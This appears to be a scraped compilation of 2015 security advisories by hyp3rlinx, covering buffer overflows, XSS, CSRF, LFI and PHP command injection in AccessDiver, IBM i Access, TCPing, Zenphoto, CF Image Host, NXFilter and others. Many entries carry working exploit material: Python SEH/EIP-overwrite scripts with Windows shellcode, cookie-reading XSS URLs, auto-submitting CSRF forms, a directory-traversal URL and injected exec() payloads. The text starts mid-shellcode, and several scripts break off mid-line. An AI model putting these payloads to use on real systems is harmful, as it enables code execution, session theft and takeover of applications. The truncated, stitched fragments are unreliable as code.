"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#payload="A"*2475+"R"*4+"\xcc"*100  #< control EIP register

#find appropriate assembly instruction to call our payload JMP or CALL ECX.
#!mona jmp -r ecx -m kernel32.dll

eip=struct.pack('

AccessDiver V4.301 Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt



Vendor:
==
M. Jean Fages
www.accessdiver.com
circa 1998-2006


Product:
=
AccessDiver V4.301 build 5888


AccessDiver is a security tester for Web pages. It has got a set of tools which
will verify the robustness of you accounts and directories. You will know if 
your
customers, your users and you can use safely your web site.


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=

AccessDiver is vulnerable to multiple buffer overflows, two vectors are 
described below.

1) buffer overflow @ 2073 bytes in URL field for Server / IP address and will 
overwrite NSEH and SEH exception handlers.

EAX 
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX 
ESP 0012EA08
EBP 0012EA28
ESI 
EDI 
EIP 52525252 <- BOOM
C 0  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 0  SS 0023 32bit 0()
Z 1  DS 0023 32bit 0()
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS  NULL
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
   3 2 1 0  E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1272  Prec NEAR,53  Mask1 1 0 0 1 0



2) Buffer overflow  when loading a malicious "Exploit zone file" text file 
containing 2080 bytes,
load text file from "Weak History" Menu choose Import "from File" choose 
exploit text file and BOOM!


EAX 
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX 
ESP 0018E940
EBP 0018E960
ESI 
EDI 
EIP 52525242  <- KABOOM
C 0  ES 002B 32bit 0()
P 1  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 1  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
   3 2 1 0  E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1372  Prec NEAR,64  Mask1 1 0 0 1 0


Windbg dump...

(2abc.2330): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx= ecx=52525252 edx=7702b4ad esi= edi=
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
52525252 ??  ???



Disclosure Timeline:
=
Vendor Notification:  NA
December 26, 2015 : Public Disclosure




Exploitation Technique:
===
Local



Severity Level:

Med



===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

phpback v1.1 XSS vulnerability

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/PHPBACK-XSS.txt



Vendor:

www.phpback.org



Product:
===
phpback v1.1

The open source feedback system, PHPBack is feedback a web application that you 
can easily
implement on your website. It gives your customers a way to communicate their 
ideas to
improve your products.



Vulnerability Type:
==
Cross site scripting - XSS



CVE Reference:
==
N/A



Vulnerability Details:
==
XSS vulnerability exist in search field 'query' parameter allowing arbitrary 
client side JS code
execution on victims who click our infected linx or visit our infected webpage. 
Session ID theft
may follow as well as possibility to bypass CSRF protections etc...



XSS Exploit code(s):
===

http://localhost/phpback_v1.1/phpback-1.1c/home/search; method="POST">
  
document.getElementById('InFeCT0r').submit()




Disclosure Timeline:
=
Vendor Notification: December 11, 2015 
December 15, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




Description:
=
Request Method(s):  [+] POST


Vulnerable Product: [+] phpback v1.1


Vulnerable Parameter(s):[+] query



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

Zenphoto 1.4.10 Local File Inclusion

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt



Vendor:

www.zenphoto.org



Product:
===
Zenphoto 1.4.10




Vulnerability Type:

Local File Inclusion



CVE Reference:
==
N/A



Vulnerability Details:
==
Zen Photos pluginDoc.php PHP file is vulnerable to local file inclusion that 
allows attackers
to read arbitrary server files outside of the current web directory by 
injecting "../" directory traversal
characters, which can lead to sensitive information disclosure, code execution 
or DOS on the victims web server.


Local File Inclusion Codes:
==
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1=../../../xampp/phpinfo



Disclosure Timeline:
=
Vendor Notification: November 10, 2015 
December 1, 2015  : Public Disclosure




Exploitation Technique:
===
Local



Severity Level:

High




Description:
=
Request Method(s):  [+] GET


Vulnerable Product: [+] Zenphoto 1.4.10


Vulnerable Parameter(s):[+] extension



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

Zenphoto 1.4.10 XSS Vulnerability

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-XSS.txt



Vendor:

www.zenphoto.org



Product:
===
Zenphoto 1.4.10




Vulnerability Type:
==
Cross site scripting - XSS



CVE Reference:
==
N/A



Vulnerability Details:
==
Multiple XSS entry points exist allowing arbitrary client side JS code 
execution on victims
who click our infected linx. Session ID and data theft may follow as well as 
possibility to
bypass CSRF protections, injection of iframes to establish communication 
channels etc...



XSS Exploit code(s):
===

1)
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin-plugins.php?tab=%22%22%20onMouseMove=%22alert%28%27XSS%20hyp3rlinx%20Nov%205,%202015\n%27%2bdocument.cookie%29%22%20=666


2)
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin-options.php?page=options=plugin=%22%20onMouseMove=%22alert%28%27XSS%20hyp3rlinx\n%27%2bdocument.cookie%29%22

3)
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin.php?msg=hyp3rlinx=external=%22+onMouseMove%3D%22alert%28%27hyp3rlinx%20\n\n%20%27%2bdocument.cookie%29%3B




Disclosure Timeline:
=
Vendor Notification: November 10, 2015 
December 1, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




Description:
=
Request Method(s):  [+] GET


Vulnerable Product: [+] Zenphoto 1.4.10


Vulnerable Parameter(s):[+] tab, single, error



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

IBM i Access Buffer Overflow Code DOS CVE-2015-7422

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/IBMI-ACCESS-BUFFER-OVERFLOW-DOS.txt



Vendor:
==
www.ibm.com



Product:

IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected



Vulnerability Type:

Stack Buffer Overflow DOS



CVE Reference:
==
CVE-2015-7422



Vulnerability Details:
=
IBM i Access for Windows vulnerable to a buffer overflow, caused by improper 
bounds checking.
A local attacker could overflow a buffer and cause the program to crash.


Remediation/Fixes
The issue can be fixed by obtaining and applying the Service Pack SI57907.

The buffer overflow vulnerability can be remediated by applying Service Pack 
SI57907.

The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html

Workarounds and Mitigations
None known

CVSS Base Score: 4
CVSS Temporal Score: See 
https://exchange.xforce.ibmcloud.com/vulnerabilities/107770 for the current 
score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)



Disclosure Timeline:

Vendor Notification:  May 21, 2015
November 18, 2015  : Public Disclosure



Exploitation Technique:
===
Local 



Severity Level:

Med



Description:
==
Request Method(s):  [+] local  


Vulnerable Product: [+] IBM i Access for Windows Release 7.1


Affected Area(s):   [+] IBMI i Access



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

IBM i Access Buffer Overflow Code Exec CVE-2015-2023

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt



Vendor:
==
www.ibm.com



Product:

IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected



Vulnerability Type:
===
Stack Buffer Overflow
Arbitrary Code Exec



CVE Reference:
==
CVE-2015-2023



Vulnerability Details:
=
IBM i Access for Windows is vulnerable to a buffer overflow. A local attacker 
could overflow a
buffer and execute arbitrary code on the Windows PC.

client Access has ability to receive remote commands via "Cwbrxd.exe" service 
Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253 

"Incoming remote command was designed for running non-interactive commands and 
programs on a PC",
therefore a remote attacker could execute arbitrary code on the system.

Remediation/Fixes
The issue can be fixed by obtaining and applying the Service Pack SI57907.

The buffer overflow vulnerability can be remediated by applying Service Pack 
SI57907.

The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html

Workarounds and Mitigations
None known

CVSS Base Score: 4.4
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the 
current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)


Exploit code(s):
==

Three python POC scriptz follow that exploitz various component of IBM i Access.


1) Exploits "ftdwprt.exe", direct EIP overwrite

import struct,os,subprocess

pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe  "

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


# use jmp or call esp in FTDBT.dll under AFPviewer for Client Access
# we find ---> 0x638091df : jmp esp |  {PAGE_EXECUTE_READ} [FTDBDT.dll] ASLR: 
False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00
(C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)

rp=struct.pack('

CF Image Host XSS

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-XSS.txt



Vendor:

codefuture.co.uk/projects/imagehost



Product:
===
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6



Vulnerability Type:
==
Cross site scripting - XSS



CVE Reference:
==
N/A



Vulnerability Details:
=

Multiple reflected XSS entry points exist allowing arbitrary client side
browser code execution on victims who click our infected linx. Undermining
the trust between the client and server, possibly leading to information theft,
drop malware, steal session cookies etc...



XSS Exploit code(s):
===

1)
http://localhost/imagehost1.6.6/admin.php?act=images=%22%20onMouseMove=%22alert%280%29

2) 
http://localhost/imagehost1.6.6/admin.php?act=edit=%22%20onMouseMove=%22alert%280%29


3) 
http://localhost/imagehost1.6.6/admin.php?act=images=%22%20onMouseMove=%22alert%280%29




Disclosure Timeline:
=
Vendor Notification:  NA
November 14, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium




Description:
=


Request Method(s):  [+] GET


Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6


Vulnerable Parameter(s):[+] orderBy, id, ip



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

CF Image Host PHP Command Injection

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt



Vendor:

codefuture.co.uk/projects/imagehost



Product:
===
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6


Vulnerability Type:
=
PHP Command Injection



CVE Reference:
==
N/A



Vulnerability Details:
=

CF Imagehost allows users who have access to the management area the ability to 
write directly to the 'set.php' page under
the /inc directory that stores setting values for the 'Site Title', 'Site 
Slogan' etc, this allows a local attacker ability to
inject specially crafted PHP command payloads to execute arbitrary operating 
system commands on the victim host. Possibly leading
to privilege escalation, RFI, backdoors etc.. and most likely full compromise 
of the affected system or shared environment
if applicable. 




PHP Command Injection Exploit code(s):
=

Under the setting tab we can inject following below PHP code and it will remain 
persistent as it is written disk in 'set.php',
afterwards when the victim visits the application and click a tab the 
persistent OS command will be executed.


1) navigate to CF image host settings tab 
http://localhost/imagehost1.6.6/admin.php?act=set
2) click on admin menu on left and enter your passwords DO NOT click 'Save 
changes' yet! or you get error message to enter creds
3) now go back to settings tab and click 'General' then inject below PHP code 
into the 'Site Title' input field
4) now click 'Save Changes', this code will get stored under  /inc directory 
within the 'set.php' PHP file.

our PHP injection payload needs the single quotes, double back slashes, 
semicolons as described below to correctly escape the syntax
so we do not break the PHP page and cause errors, our extra \\ quoutes and ; 
gets removed after injection takes place.

some examples...


';echo exec("c:\\Windows\\system32\\calc.exe");'';';

'set.php' on line 11 then becomes:
$settings['SET_TITLE'] = '';echo exec("c:\Windows\system32\calc.exe");'';';';

OR inject CMD to launch chrome.exe etc...

';echo exec("c:\\Program Files 
(x86)\\Google\\Chrome\\Application\\chrome.exe");'';';

  
After, click on some tabs above like 'Database' or 'Ban User' and Tada! this 
will execute our stored PHP command... 
either running calc.exe or launching Google Chrome.



Disclosure Timeline:
=
Vendor Notification:  NA
November 13, 2015  : Public Disclosure



Exploitation Technique:
===
Local / Remote



Severity Level:

High



Description:


Request Method(s):[+] POST


Vulnerable Product:   [+] CF Image Host 1.65 - 1.6.6


Vulnerable Parameter(s):  [+] 'Site Title', 'Site Slogan' etc..


Affected Area(s): [+]  OS



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

CF Image Host CSRF

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt



Vendor:

codefuture.co.uk/projects/imagehost



Product:
===
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6



Vulnerability Type:
=
Cross site request forgery - CSRF



CVE Reference:
==
N/A



Vulnerability Details:
=

No CSRF protection exists allowing attackers to make requests to the server
on behalf of the victim if they are logged in and visit a malicious site or 
click
an infected linx. This will let attackers modify certain web application 
settings to
whatever the attacker wishes.



CSRF Exploit code(s):



http://localhost/imagehost1.6.6/admin.php?act=set;>
http://hyp3rlinx.altervista.org; 
/>















































document.getElementById('HELL').submit()

  



Disclosure Timeline:
=
Vendor Notification: NA
November 14, 2015  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

High



Description:



Request Method(s):[+] POST


Vulnerable Product:   [+] CF Image Host 1.65 - 1.6.6
 


[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

Microsoft .NET Framework XSS / Elevation of Privilege CVE-2015-6099

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MICROSOFT-XSS-ELEVATION-OF-PRIVILEGE.txt



Vendor:
==
www.microsoft.com



Product:
===
Microsoft .NET Framework


Vulnerability Type:

XSS / Elevation of Privilege


CVE Reference:
==
CVE-2015-6099



Vulnerability Details:
==

Microsoft .NET Framework is prone to a cross-site scripting vulnerability 
because it fails
to properly sanitize user-supplied input. An attacker may leverage this issue 
to execute arbitrary
script code in the browser of an unsuspecting user in the context of the 
affected site. This may
allow the attacker to steal cookie-based authentication credentials and launch 
other attacks.

.NET Elevation of Privilege Vulnerability - CVE-2015-6099

An elevation of privilege vulnerability exists when ASP.NET improperly 
validates values in HTTP requests,
exposing users to a potential cross-site scripting (XSS) attack. An attacker 
who successfully exploited the
vulnerability could leverage a vulnerable website to inject client-side script 
into a user’s browser and
ultimately modify or spoof content, conduct phishing activities, disclose 
information, or perform any action on
the vulnerable website that the target user has permission to perform. To 
exploit this vulnerability, user interaction
is required. In a web-browsing scenario a user would have to navigate to a 
compromised website.

In an email attack scenario an attacker would have to convince a user who is 
logged on to a vulnerable server to
click a specially crafted link in an email. The update addresses the 
vulnerability by modifying how ASP.NET validates
the value of an HTTP request.

Microsoft received information about the vulnerability through coordinated 
vulnerability disclosure. At the time this security
bulletin was originally issued, Microsoft was unaware of any attack attempting 
to exploit this vulnerability.

Microsoft has not identified any mitigating factors for this vulnerability.
Microsoft has not identified any workarounds for this vulnerability.

The following workarounds may be helpful in your situation:

Remove requestPathInvalidCharacters key from web.config
In order to work around this issue, administrators can remove the 
non-default setting from web.config, or at least include “:” in the 
requestPathInvalidCharacters setting.

How to undo the workaround: 
Restore the previously removed  
line.


https://technet.microsoft.com/library/security/MS15-118
http://www.symantec.com/security_response/vulnerability.jsp?bid=77479_rssid=sr-advisories
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6099



Disclosure Timeline:

Vendor Notification: August 15, 2015
November 10, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
High



Description:


Request Method(s):  [+]  GET / POST 


Vulnerable Product versions:

Microsoft .NET Framework 4.0
Microsoft .NET Framework 4.5
Microsoft .NET Framework 4.5.1
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 4.6
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8 for x64-based Systems
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT
Microsoft Windows RT 8.1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Vista SP2
Microsoft Windows Vista x64 Edition SP2


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

NXFilter v3.0.3 CSRF

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-CSRF.txt



Vendor:

www.nxfilter.org/p2/



Product:

NXFilter v3.0.3



Vulnerability Type:
=
Cross site request forgery - CSRF



CVE Reference:
==
N/A



Vulnerability Details:
=
No CSRF protections exist allowing us to make malicious HTTP requests on behalf 
of our victim.
The Server will then happily process any of the following actions if our victim 
clicks our infected linx
or visits our malicious website while currently logged in to the vulnerable 
application.

1) "add arbitrary users"
2) "add or change SMTP settings"
3) "add arbitrary redirect domains"
4) "add arbitrary zone transfers"
5) "delete zone transfer domains"



Exploit code(s):
===









function doit(){
 var e=document.getElementById('HELL')
 e.submit()
}




1) CSRF add arbitrary users

http://localhost/user,user.jsp; method="post">


  
< and some persistent XSS!



2) CSRF add or change SMTP notification alerts

http://localhost/config,alert.jsp; method="post">








 



3) CSRF add arbitrary redirect domain
 
http://localhost/config,redirection.jsp; method="post">



 



4) CSRF add arbitrary zone transfers

http://localhost/config,zone_transfer.jsp; 
method="post">



 



5) CSRF delete zone transfer domains

http://localhost/config,zone_transfer.jsp?action_flag=delete=1

  

Disclosure Timeline:
==
Vendor Notification: October 18, 2015
November 5, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
High



Description:
==

Request Method(s):  [+] GET / POST


Vulnerable Product: [+] NXFilter v3.0.3


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

NXFilter v3.0.3 Persistent / Reflected XSS

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-XSS.txt



Vendor:

www.nxfilter.org/p2/



Product:

NXFilter v3.0.3



Vulnerability Type:
=
Persistent & Reflected XSS



CVE Reference:
==
N/A




Vulnerability Details:
=
Persistent & reflected XSS entry points exist allowing arbitrary client side 
browser code execution
on victims who click our infected linx or visit persistently stored XSS 
payloads. XSS strings seem
to get filtered, yet we can defeat that using JS String.fromCharCode() 
functions.



Exploit code(s):
===

1) persistent XSS under category / custom
   "name" parameter is vulnerable to persistent XSS injection using POST method.

http://localhost/category,custom.jsp



2) reflected XSS

http://localhost/classifier,ruleset.jsp?action_flag==1=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E



3) reflected XSS

http://localhost/report,daily.jsp?stime=2015%2F10%2F17_option=yesterday=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2872%29%2bString.fromCharCode%2869%29%2bString.fromCharCode%2876%29%2bString.fromCharCode%2876%29%29%3C/script%3E




Disclosure Timeline:
===
Vendor Notification:  October 18, 2015
November 5, 2015 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
High



Description:
==
Request Method(s):  [+] GET / POST


Vulnerable Product: [+] NXFilter v3.0.3


Vulnerable Parameter(s):[+] name, user, kw



===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

TCPing 2.1.0 Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt



Vendor:

Spetnik.com



Product:
=
Spetnik TCPing 2.1.0 / tcping.exe
circa 2007

TCPing "pings" a server on a specific port using TCP/IP by opening and closing a
connection on the specified port. Results are returned in a similar fashion to 
that
of Microsoft Windows Ping. This application is intended for use in testing for 
open
ports on remote machines, or as an alternative to the standard "ping" in a case
where ICMP packets are blocked or ignored.



Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A




Vulnerability Details:
=

If TCPing is called with an specially crafted CL argument we will cause 
exception and overwrite
the Pointers to next SEH record and SEH handler with our buffer and malicious 
shellcode.  
No suitable POP POP RET address is avail in TCPing as they start with null 
bytes 0x00 and will
break our shellcode. However, TCPing is not compiled with SafeSEH which is a 
linker option, so we
can grab an address from another module that performs POP POP RET instructions 
to acheive
arbitrary code execution on victims system.


stack dump...


EAX 0045
ECX 0040A750 tcping.0040A750
EDX 41414141
EBX 02CC
ESP 0018FA50
EBP 0018FA50
ESI 0018FD21 ASCII "rror: Unknown host AA
EDI 0018FCC8
EIP 0040270A tcping.0040270A
C 0  ES 002B 32bit 0()
P 1  CS 0023 32bit 0()
A 1  SS 002B 32bit 0()
Z 0  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr WSANO_DATA (2AFC)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)


WinDBG dump...


(17a8.149c): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image0040
*** ERROR: Module load completed but symbols could not be loaded for 
image0040
eax=0045 ebx=0222 ecx=0040a750 edx=41414141 esi=0018fd21 edi=0018fcc8
eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0 nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010216
image0040+0x270a:
0040270a 8802mov byte ptr [edx],al  ds:002b:41414141=??



Exploit code(s):
===

Python script...


import struct,os,subprocess

#Spetnik TCPing Utility 2.1.0
#buffer overflow SEH exploit
#by hyp3rlinx 


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\tcping.exe "

nseh="\xEB\x06"+"\x90"*2  #JMP TO OUR SHELLCODE

seh=struct.pack('

PHP Server Monitor 3.1.1 Privilege Escalation

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt



Vendor:

www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:

PHP Server Monitor 3.1.1


Vulnerability Type:
=
Privilege Escalation / CSRF



Vulnerability Details:
=

PHP Server Monitor uses level 20 for basic user and level 10 for Admins these 
are stored in Database. Basic users can elevate thier privileges to that of 
Administrator
by crafting an HTTP payload changing their level to '10' then getting an 
Administrator to click an infected link or visit a malicious website to launch 
an
CSRF attack which will grant the user admin access. This problem is due to no 
CSRF protection mechanism in place. 




Exploit code(s):
===

1) privilege escalation / CSRF






function doit(){
var e=document.getElementById('HELL')
